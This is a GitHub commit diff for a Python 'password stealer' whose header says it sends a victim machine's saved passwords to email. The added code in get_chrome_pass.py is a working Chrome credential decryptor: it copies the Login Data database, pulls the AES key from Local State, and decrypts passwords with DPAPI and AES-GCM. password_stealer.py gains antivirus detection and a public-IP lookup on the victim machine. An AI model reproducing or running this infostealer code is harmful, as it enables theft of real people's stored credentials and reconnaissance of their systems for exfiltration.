v1.7 [Using colorama + ChromePassStealerFix + PyinstallerPathFinderFix
PushpenderIndia committed Apr 20, 2022
1 parent e07e9cc commit 4a9a332
Showing 7 changed files with 273 additions and 156 deletions.
45 changes: 2 additions & 43 deletions banners.py
Expand Up @@ -65,27 +65,6 @@
"""

figlet_ogre = """
_____ _ __
/__ \___ ___| |__ /\ \ \_____ __/\ /\___ _ __ ___ ___
/ /\/ _ \/ __| '_ \ / \/ / _ \ \ /\ / / /_/ / _ \| '__/ __|/ _ \
/ / | __/ (__| | | / /\ / (_) \ V V / __ / (_) | | \__ \ __/
\/ \___|\___|_| |_\_\ \/ \___/ \_/\_/\/ /_/ \___/|_| |___/\___|
"""

figlet_slant = """
______ __ _ __ __ __
/_ __/__ _____/ /_ / | / /___ _ __/ / / /___ _____________
/ / / _ \/ ___/ __ \/ |/ / __ \ | /| / / /_/ / __ \/ ___/ ___/ _ \
/ / / __/ /__/ / / / /| / /_/ / |/ |/ / __ / /_/ / / (__ ) __/
/_/ \___/\___/_/ /_/_/ |_/\____/|__/|__/_/ /_/\____/_/ /____/\___/
"""

figlet_small = """
Expand All @@ -96,27 +75,7 @@
"""

figlet_smslant = """
______ __ _ __ __ __
/_ __/__ ____/ / / |/ /__ _ __/ // /__ _______ ___
/ / / -_) __/ _ \/ / _ \ |/|/ / _ / _ \/ __(_-</ -_)
/_/ \__/\__/_//_/_/|_/\___/__,__/_//_/\___/_/ /___/\__/
"""

figlet_standard = """
_____ _ _ _ _ _
|_ _|__ ___| |__ | \ | | _____ _| | | | ___ _ __ ___ ___
| |/ _ \/ __| '_ \| \| |/ _ \ \ /\ / / |_| |/ _ \| '__/ __|/ _ \
| | __/ (__| | | | |\ | (_) \ V V /| _ | (_) | | \__ \ __/
|_|\___|\___|_| |_|_| \_|\___/ \_/\_/ |_| |_|\___/|_| |___/\___|
"""


def get_banner():
return random.choice([figlet_ansi_shadow, figlet_big, figlet_doom, figlet_drpepper, figlet_ogre, figlet_slant, figlet_small, figlet_smslant, figlet_standard])
return random.choice([figlet_ansi_shadow, figlet_big, figlet_doom, figlet_drpepper, figlet_small])
171 changes: 132 additions & 39 deletions get_chrome_pass.py
@@ -1,42 +1,135 @@
import os, sqlite3, win32crypt, six
#python -m pip install --upgrade pywin32
import os
import sys
import shutil
import sqlite3
import json, base64

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes)

class GetChromePass:
def __init__(self):
self.data_path = os.path.expanduser('~').replace("\\", '/') + "/AppData/Local/Google/Chrome/User Data/Default"
self.login_db = os.path.join(self.data_path, 'Login Data')
self.result = ""

def start(self):
#Retriving Password Hash From Database File
c = sqlite3.connect(self.login_db)
cursor = c.cursor()
select_statement = "SELECT origin_url, username_value, password_value FROM logins"
cursor.execute(select_statement)
login_data = cursor.fetchall()

credentials_dict = {}

#Decrypting password
for url, user_name, pwd, in login_data:
pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #Tuple
credentials_dict[url] = (user_name, pwd[1])

#Iterating Each Creds and Storing it in "self.result"
for url, credentials in six.iteritems(credentials_dict):
if credentials[1]:
self.result += "\n\nURL : " + url
self.result += "\nUsername : " + credentials[0]
self.result += "\nPassword : " + credentials[1].decode('utf-8')

else:
self.result += "\n\nURL : " + url
self.result += "\nUsername : NOT FOUND"
self.result += "\nPassword : NOT FOUND"

return self.result

if __name__ == '__main__':
test = GetChromePass()
result = test.start()
print(result)
self.passwordlog = ""
self.APP_DATA_PATH = os.environ['LOCALAPPDATA']
self.DB_PATH = r'Google\Chrome\User Data\Default\Login Data'
self.NONCE_BYTE_SIZE = 12

def start(self):
_full_path = os.path.join(self.APP_DATA_PATH, self.DB_PATH)
_temp_path = os.path.join(self.APP_DATA_PATH, 'sqlite_file')
if os.path.exists(_temp_path):
os.remove(_temp_path)
shutil.copyfile(_full_path,_temp_path)
self.show_password(_temp_path)
return self.passwordlog

def show_password(self, db_file):
conn = sqlite3.connect(db_file)
_sql = 'select signon_realm,username_value,password_value from logins'
for row in conn.execute(_sql):
host = row[0]
if host.startswith('android'):
continue
name = row[1]
value = self.chrome_decrypt(row[2])
_info = 'Hostname: %s\nUsername: %s\nPassword: %s\n\n' %(host,name,value)
self.passwordlog += _info
conn.close()
os.remove(db_file)

def chrome_decrypt(self, encrypted_txt):
if sys.platform == 'win32':
try:
if encrypted_txt[:4] == b'\x01\x00\x00\x00':
decrypted_txt = self.dpapi_decrypt(encrypted_txt)
return decrypted_txt.decode()
elif encrypted_txt[:3] == b'v10':
decrypted_txt = self.aes_decrypt(encrypted_txt)
return decrypted_txt[:-16].decode()
except WindowsError:
return None
else:
try:
return unix_decrypt(encrypted_txt)
except NotImplementedError:
return None

def encrypt(self, cipher, plaintext, nonce):
cipher.mode = modes.GCM(nonce)
encryptor = cipher.encryptor()
ciphertext = encryptor.update(plaintext)
return (cipher, ciphertext, nonce)

def decrypt(self, cipher, ciphertext, nonce):
cipher.mode = modes.GCM(nonce)
decryptor = cipher.decryptor()
return decryptor.update(ciphertext)

def get_cipher(self, key):
cipher = Cipher(
algorithms.AES(key),
None,
backend=default_backend()
)
return cipher

def dpapi_decrypt(self, encrypted):
import ctypes
import ctypes.wintypes

class DATA_BLOB(ctypes.Structure):
_fields_ = [('cbData', ctypes.wintypes.DWORD),
('pbData', ctypes.POINTER(ctypes.c_char))]

p = ctypes.create_string_buffer(encrypted, len(encrypted))
blobin = DATA_BLOB(ctypes.sizeof(p), p)
blobout = DATA_BLOB()
retval = ctypes.windll.crypt32.CryptUnprotectData(
ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
if not retval:
raise ctypes.WinError()
result = ctypes.string_at(blobout.pbData, blobout.cbData)
ctypes.windll.kernel32.LocalFree(blobout.pbData)
return result

def unix_decrypt(self, encrypted):
if sys.platform.startswith('linux'):
password = 'peanuts'
iterations = 1
else:
raise NotImplementedError

from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2

salt = 'saltysalt'
iv = ' ' * 16
length = 16
key = PBKDF2(password, salt, length, iterations)
cipher = AES.new(key, AES.MODE_CBC, IV=iv)
decrypted = cipher.decrypt(encrypted[3:])
return decrypted[:-ord(decrypted[-1])]

def get_key_from_local_state(self):
jsn = None
with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode ="r") as f:
jsn = json.loads(str(f.readline()))
return jsn["os_crypt"]["encrypted_key"]

def aes_decrypt(self, encrypted_txt):
encoded_key = self.get_key_from_local_state()
encrypted_key = base64.b64decode(encoded_key.encode())
encrypted_key = encrypted_key[5:]
key = self.dpapi_decrypt(encrypted_key)
nonce = encrypted_txt[3:15]
cipher = self.get_cipher(key)
return self.decrypt(cipher, encrypted_txt[15:], nonce)


if __name__=="__main__":
Main = GetChromePass()
password = Main.start()
print(password)



51 changes: 46 additions & 5 deletions password_stealer.py
@@ -1,14 +1,15 @@
#!/usr/bin/python3
import time, smtplib, platform, getpass
import get_chrome_pass, get_wifi_pass #Self Written Modules
import requests
import os

#==================================================================
#Author : Pushpender Singh
#Website: https://technowlogy.tk
#==================================================================
#Usage: Module is send Saved Password of Victim machine to Email.
#==================================================================
#Github: https://github.com/Technowlogy-Pushpender/
#Github: https://github.com/PushpenderIndia/
#==================================================================

class SendPass:
Expand All @@ -25,7 +26,7 @@ def get_chrome_browser_creds(self):
self.log += chrome.start()
except Exception:
time.sleep(10)
self.get_browser_creds()
self.get_chrome_browser_creds()
self.send_mail(self.log)
self.log = ""

Expand All @@ -43,10 +44,50 @@ def get_wifi_creds(self):

def get_system_info(self):
uname = platform.uname()
os = uname[0] + " " + uname[2] + " " + uname[3]
operating_system = uname[0] + " " + uname[2] + " " + uname[3]
computer_name = uname[1]
user = getpass.getuser()
return "Operating System:\t" + os + "\nComputer Name:\t\t" + computer_name + "\nUser:\t\t\t\t" + user

# Finding AV
av = "Unknown"
if os.path.exists('C:\\Program Files\\Windows Defender'):
av = 'Windows Defender'
if os.path.exists('C:\\Program Files\\AVAST Software\\Avast'):
av = 'Avast'
if os.path.exists('C:\\Program Files\\AVG\\Antivirus'):
av = 'AVG'
if os.path.exists('C:\\Program Files\\Avira\\Launcher'):
av = 'Avira'
if os.path.exists('C:\\Program Files\\IObit\\Advanced SystemCare'):
av = 'Advanced SystemCare'
if os.path.exists('C:\\Program Files\\Bitdefender Antivirus Free'):
av = 'Bitdefender'
if os.path.exists('C:\\Program Files\\COMODO\\COMODO Internet Security'):
av = 'Comodo'
if os.path.exists('C:\\Program Files\\DrWeb'):
av = 'Dr.Web'
if os.path.exists('C:\\Program Files\\ESET\\ESET Security'):
av = 'ESET'
if os.path.exists('C:\\Program Files\\GRIZZLY Antivirus'):
av = 'Grizzly Pro'
if os.path.exists('C:\\Program Files\\Kaspersky Lab'):
av = 'Kaspersky'
if os.path.exists('C:\\Program Files\\IObit\\IObit Malware Fighter'):
av = 'Malware fighter'
if os.path.exists('C:\\Program Files\\360\\Total Security'):
av = '360 Total Security'

try:
IP_Address = requests.get('http://ip.42.pl/raw').text
except: IP_Address = "Unknown"

sys_logs = "Operating System: " + operating_system + "\n"
sys_logs += "Computer Name: " + computer_name + "\n"
sys_logs += "User: " + user + "\n"
sys_logs += "IP Address: " + IP_Address + "\n"
sys_logs += "Anti Virus: " + av

return sys_logs

def send_mail(self, message):
try:
